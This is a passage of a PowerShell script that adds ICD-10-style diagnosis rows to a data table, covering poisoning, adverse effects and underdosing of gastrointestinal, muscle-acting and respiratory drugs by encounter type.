of antidiarrheal drugs","Adverse effect of antidiarrheal drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antidiarrheal drugs","Underdosing of antidiarrheal drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antidiarrheal drugs","Underdosing of antidiarrheal drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antidiarrheal drugs","Underdosing of antidiarrheal drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by emetics, accidental (unintentional)","Poisoning by emetics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emetics, accidental (unintentional)","Poisoning by emetics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emetics, accidental (unintentional)","Poisoning by emetics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by emetics, intentional self-harm","Poisoning by emetics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emetics, intentional self-harm","Poisoning by emetics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emetics, intentional self-harm","Poisoning by emetics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by emetics, assault","Poisoning by emetics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emetics, assault","Poisoning by emetics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emetics, assault","Poisoning by emetics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by emetics, undetermined","Poisoning by emetics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emetics, undetermined","Poisoning by emetics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by emetics, undetermined","Poisoning by emetics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of emetics","Adverse effect of emetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of emetics","Adverse effect of emetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of emetics","Adverse effect of emetics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of emetics","Underdosing of emetics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of emetics","Underdosing of emetics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of emetics","Underdosing of emetics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting gastrointestinal system, accidental (unintentional)","Poisoning by other agents primarily affecting gastrointestinal system, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting gastrointestinal system, accidental (unintentional)","Poisoning by other agents primarily affecting gastrointestinal system, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting gastrointestinal system, accidental (unintentional)","Poisoning by other agents primarily affecting gastrointestinal system, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting gastrointestinal system, intentional self-harm","Poisoning by other agents primarily affecting gastrointestinal system, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting gastrointestinal system, intentional self-harm","Poisoning by other agents primarily affecting gastrointestinal system, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting gastrointestinal system, intentional self-harm","Poisoning by other agents primarily affecting gastrointestinal system, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting gastrointestinal system, assault","Poisoning by other agents primarily affecting gastrointestinal system, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting gastrointestinal system, assault","Poisoning by other agents primarily affecting gastrointestinal system, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting gastrointestinal system, assault","Poisoning by other agents primarily affecting gastrointestinal system, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting gastrointestinal system, undetermined","Poisoning by other agents primarily affecting gastrointestinal system, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting gastrointestinal system, undetermined","Poisoning by other agents primarily affecting gastrointestinal system, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other agents primarily affecting gastrointestinal system, undetermined","Poisoning by other agents primarily affecting gastrointestinal system, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other agents primarily affecting gastrointestinal system","Adverse effect of other agents primarily affecting gastrointestinal system, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other agents primarily affecting gastrointestinal system","Adverse effect of other agents primarily affecting gastrointestinal system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other agents primarily affecting gastrointestinal system","Adverse effect of other agents primarily affecting gastrointestinal system, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other agents primarily affecting gastrointestinal system","Underdosing of other agents primarily affecting gastrointestinal system, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other agents primarily affecting gastrointestinal system","Underdosing of other agents primarily affecting gastrointestinal system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other agents primarily affecting gastrointestinal system","Underdosing of other agents primarily affecting gastrointestinal system, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the gastrointestinal system, accidental (unintentional)","Poisoning by unspecified agents primarily affecting the gastrointestinal system, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the gastrointestinal system, accidental (unintentional)","Poisoning by unspecified agents primarily affecting the gastrointestinal system, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the gastrointestinal system, accidental (unintentional)","Poisoning by unspecified agents primarily affecting the gastrointestinal system, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the gastrointestinal system, intentional self-harm","Poisoning by unspecified agents primarily affecting the gastrointestinal system, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the gastrointestinal system, intentional self-harm","Poisoning by unspecified agents primarily affecting the gastrointestinal system, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the gastrointestinal system, intentional self-harm","Poisoning by unspecified agents primarily affecting the gastrointestinal system, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the gastrointestinal system, assault","Poisoning by unspecified agents primarily affecting the gastrointestinal system, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the gastrointestinal system, assault","Poisoning by unspecified agents primarily affecting the gastrointestinal system, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the gastrointestinal system, assault","Poisoning by unspecified agents primarily affecting the gastrointestinal system, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the gastrointestinal system, undetermined","Poisoning by unspecified agents primarily affecting the gastrointestinal system, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the gastrointestinal system, undetermined","Poisoning by unspecified agents primarily affecting the gastrointestinal system, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily affecting the gastrointestinal system, undetermined","Poisoning by unspecified agents primarily affecting the gastrointestinal system, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified agents primarily affecting the gastrointestinal system","Adverse effect of unspecified agents primarily affecting the gastrointestinal system, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified agents primarily affecting the gastrointestinal system","Adverse effect of unspecified agents primarily affecting the gastrointestinal system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified agents primarily affecting the gastrointestinal system","Adverse effect of unspecified agents primarily affecting the gastrointestinal system, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified agents primarily affecting the gastrointestinal system","Underdosing of unspecified agents primarily affecting the gastrointestinal system, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified agents primarily affecting the gastrointestinal system","Underdosing of unspecified agents primarily affecting the gastrointestinal system, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified agents primarily affecting the gastrointestinal system","Underdosing of unspecified agents primarily affecting the gastrointestinal system, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by oxytocic drugs, accidental (unintentional)","Poisoning by oxytocic drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oxytocic drugs, accidental (unintentional)","Poisoning by oxytocic drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oxytocic drugs, accidental (unintentional)","Poisoning by oxytocic drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by oxytocic drugs, intentional self-harm","Poisoning by oxytocic drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oxytocic drugs, intentional self-harm","Poisoning by oxytocic drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oxytocic drugs, intentional self-harm","Poisoning by oxytocic drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by oxytocic drugs, assault","Poisoning by oxytocic drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oxytocic drugs, assault","Poisoning by oxytocic drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oxytocic drugs, assault","Poisoning by oxytocic drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by oxytocic drugs, undetermined","Poisoning by oxytocic drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oxytocic drugs, undetermined","Poisoning by oxytocic drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by oxytocic drugs, undetermined","Poisoning by oxytocic drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of oxytocic drugs","Adverse effect of oxytocic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of oxytocic drugs","Adverse effect of oxytocic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of oxytocic drugs","Adverse effect of oxytocic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of oxytocic drugs","Underdosing of oxytocic drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of oxytocic drugs","Underdosing of oxytocic drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of oxytocic drugs","Underdosing of oxytocic drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], accidental (unintentional)","Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], accidental (unintentional)","Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], accidental (unintentional)","Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], intentional self-harm","Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], intentional self-harm","Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], intentional self-harm","Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], assault","Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], assault","Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], assault","Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], undetermined","Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], undetermined","Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], undetermined","Poisoning by skeletal muscle relaxants [neuromuscular blocking agents], undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of skeletal muscle relaxants [neuromuscular blocking agents]","Adverse effect of skeletal muscle relaxants [neuromuscular blocking agents], initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of skeletal muscle relaxants [neuromuscular blocking agents]","Adverse effect of skeletal muscle relaxants [neuromuscular blocking agents], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of skeletal muscle relaxants [neuromuscular blocking agents]","Adverse effect of skeletal muscle relaxants [neuromuscular blocking agents], sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of skeletal muscle relaxants [neuromuscular blocking agents]","Underdosing of skeletal muscle relaxants [neuromuscular blocking agents], initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of skeletal muscle relaxants [neuromuscular blocking agents]","Underdosing of skeletal muscle relaxants [neuromuscular blocking agents], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of skeletal muscle relaxants [neuromuscular blocking agents]","Underdosing of skeletal muscle relaxants [neuromuscular blocking agents], sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs acting on muscles, accidental (unintentional)","Poisoning by unspecified drugs acting on muscles, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs acting on muscles, accidental (unintentional)","Poisoning by unspecified drugs acting on muscles, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs acting on muscles, accidental (unintentional)","Poisoning by unspecified drugs acting on muscles, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs acting on muscles, intentional self-harm","Poisoning by unspecified drugs acting on muscles, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs acting on muscles, intentional self-harm","Poisoning by unspecified drugs acting on muscles, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs acting on muscles, intentional self-harm","Poisoning by unspecified drugs acting on muscles, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs acting on muscles, assault","Poisoning by unspecified drugs acting on muscles, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs acting on muscles, assault","Poisoning by unspecified drugs acting on muscles, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs acting on muscles, assault","Poisoning by unspecified drugs acting on muscles, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs acting on muscles, undetermined","Poisoning by unspecified drugs acting on muscles, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs acting on muscles, undetermined","Poisoning by unspecified drugs acting on muscles, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified drugs acting on muscles, undetermined","Poisoning by unspecified drugs acting on muscles, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified drugs acting on muscles","Adverse effect of unspecified drugs acting on muscles, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified drugs acting on muscles","Adverse effect of unspecified drugs acting on muscles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of unspecified drugs acting on muscles","Adverse effect of unspecified drugs acting on muscles, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified drugs acting on muscles","Underdosing of unspecified drugs acting on muscles, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified drugs acting on muscles","Underdosing of unspecified drugs acting on muscles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of unspecified drugs acting on muscles","Underdosing of unspecified drugs acting on muscles, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs acting on muscles, accidental (unintentional)","Poisoning by other drugs acting on muscles, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs acting on muscles, accidental (unintentional)","Poisoning by other drugs acting on muscles, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs acting on muscles, accidental (unintentional)","Poisoning by other drugs acting on muscles, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs acting on muscles, intentional self-harm","Poisoning by other drugs acting on muscles, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs acting on muscles, intentional self-harm","Poisoning by other drugs acting on muscles, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs acting on muscles, intentional self-harm","Poisoning by other drugs acting on muscles, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs acting on muscles, assault","Poisoning by other drugs acting on muscles, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs acting on muscles, assault","Poisoning by other drugs acting on muscles, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs acting on muscles, assault","Poisoning by other drugs acting on muscles, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs acting on muscles, undetermined","Poisoning by other drugs acting on muscles, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs acting on muscles, undetermined","Poisoning by other drugs acting on muscles, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other drugs acting on muscles, undetermined","Poisoning by other drugs acting on muscles, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other drugs acting on muscles","Adverse effect of other drugs acting on muscles, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other drugs acting on muscles","Adverse effect of other drugs acting on muscles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other drugs acting on muscles","Adverse effect of other drugs acting on muscles, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other drugs acting on muscles","Underdosing of other drugs acting on muscles, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other drugs acting on muscles","Underdosing of other drugs acting on muscles, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other drugs acting on muscles","Underdosing of other drugs acting on muscles, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antitussives, accidental (unintentional)","Poisoning by antitussives, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antitussives, accidental (unintentional)","Poisoning by antitussives, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antitussives, accidental (unintentional)","Poisoning by antitussives, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antitussives, intentional self-harm","Poisoning by antitussives, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antitussives, intentional self-harm","Poisoning by antitussives, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antitussives, intentional self-harm","Poisoning by antitussives, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antitussives, assault","Poisoning by antitussives, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antitussives, assault","Poisoning by antitussives, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antitussives, assault","Poisoning by antitussives, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antitussives, undetermined","Poisoning by antitussives, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antitussives, undetermined","Poisoning by antitussives, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antitussives, undetermined","Poisoning by antitussives, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antitussives","Adverse effect of antitussives, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antitussives","Adverse effect of antitussives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antitussives","Adverse effect of antitussives, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antitussives","Underdosing of antitussives, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antitussives","Underdosing of antitussives, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antitussives","Underdosing of antitussives, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by expectorants, accidental (unintentional)","Poisoning by expectorants, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by expectorants, accidental (unintentional)","Poisoning by expectorants, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by expectorants, accidental (unintentional)","Poisoning by expectorants, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by expectorants, intentional self-harm","Poisoning by expectorants, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by expectorants, intentional self-harm","Poisoning by expectorants, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by expectorants, intentional self-harm","Poisoning by expectorants, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by expectorants, assault","Poisoning by expectorants, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by expectorants, assault","Poisoning by expectorants, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by expectorants, assault","Poisoning by expectorants, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by expectorants, undetermined","Poisoning by expectorants, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by expectorants, undetermined","Poisoning by expectorants, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by expectorants, undetermined","Poisoning by expectorants, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of expectorants","Adverse effect of expectorants, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of expectorants","Adverse effect of expectorants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of expectorants","Adverse effect of expectorants, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of expectorants","Underdosing of expectorants, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of expectorants","Underdosing of expectorants, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of expectorants","Underdosing of expectorants, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other anti-common-cold drugs, accidental (unintentional)","Poisoning by other anti-common-cold drugs, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other anti-common-cold drugs, accidental (unintentional)","Poisoning by other anti-common-cold drugs, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other anti-common-cold drugs, accidental (unintentional)","Poisoning by other anti-common-cold drugs, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other anti-common-cold drugs, intentional self-harm","Poisoning by other anti-common-cold drugs, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other anti-common-cold drugs, intentional self-harm","Poisoning by other anti-common-cold drugs, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other anti-common-cold drugs, intentional self-harm","Poisoning by other anti-common-cold drugs, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other anti-common-cold drugs, assault","Poisoning by other anti-common-cold drugs, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other anti-common-cold drugs, assault","Poisoning by other anti-common-cold drugs, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other anti-common-cold drugs, assault","Poisoning by other anti-common-cold drugs, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by other anti-common-cold drugs, undetermined","Poisoning by other anti-common-cold drugs, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other anti-common-cold drugs, undetermined","Poisoning by other anti-common-cold drugs, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by other anti-common-cold drugs, undetermined","Poisoning by other anti-common-cold drugs, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of other anti-common-cold drugs","Adverse effect of other anti-common-cold drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other anti-common-cold drugs","Adverse effect of other anti-common-cold drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of other anti-common-cold drugs","Adverse effect of other anti-common-cold drugs, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of other anti-common-cold drugs","Underdosing of other anti-common-cold drugs, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other anti-common-cold drugs","Underdosing of other anti-common-cold drugs, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of other anti-common-cold drugs","Underdosing of other anti-common-cold drugs, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiasthmatics, accidental (unintentional)","Poisoning by antiasthmatics, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiasthmatics, accidental (unintentional)","Poisoning by antiasthmatics, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiasthmatics, accidental (unintentional)","Poisoning by antiasthmatics, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiasthmatics, intentional self-harm","Poisoning by antiasthmatics, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiasthmatics, intentional self-harm","Poisoning by antiasthmatics, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiasthmatics, intentional self-harm","Poisoning by antiasthmatics, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiasthmatics, assault","Poisoning by antiasthmatics, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiasthmatics, assault","Poisoning by antiasthmatics, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiasthmatics, assault","Poisoning by antiasthmatics, assault, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by antiasthmatics, undetermined","Poisoning by antiasthmatics, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiasthmatics, undetermined","Poisoning by antiasthmatics, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by antiasthmatics, undetermined","Poisoning by antiasthmatics, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Adverse effect of antiasthmatics","Adverse effect of antiasthmatics, initial encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antiasthmatics","Adverse effect of antiasthmatics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Adverse effect of antiasthmatics","Adverse effect of antiasthmatics, sequela") + $null = $DiagnosisList.Rows.Add("Underdosing of antiasthmatics","Underdosing of antiasthmatics, initial encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antiasthmatics","Underdosing of antiasthmatics, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Underdosing of antiasthmatics","Underdosing of antiasthmatics, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily acting on the respiratory system, accidental (unintentional)","Poisoning by unspecified agents primarily acting on the respiratory system, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily acting on the respiratory system, accidental (unintentional)","Poisoning by unspecified agents primarily acting on the respiratory system, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily acting on the respiratory system, accidental (unintentional)","Poisoning by unspecified agents primarily acting on the respiratory system, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily acting on the respiratory system, intentional self-harm","Poisoning by unspecified agents primarily acting on the respiratory system, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily acting on the respiratory system, intentional self-harm","Poisoning by unspecified agents primarily acting on the respiratory system, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily acting on the respiratory system, intentional self-harm","Poisoning by unspecified agents primarily acting on the respiratory system, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily acting on the respiratory system, assault","Poisoning by unspecified agents primarily acting on the respiratory system, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by unspecified agents primarily acting on the respiratory system, assault","Poisoning by unspecified agents primarily acting on the respiratory system, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Poisoning by 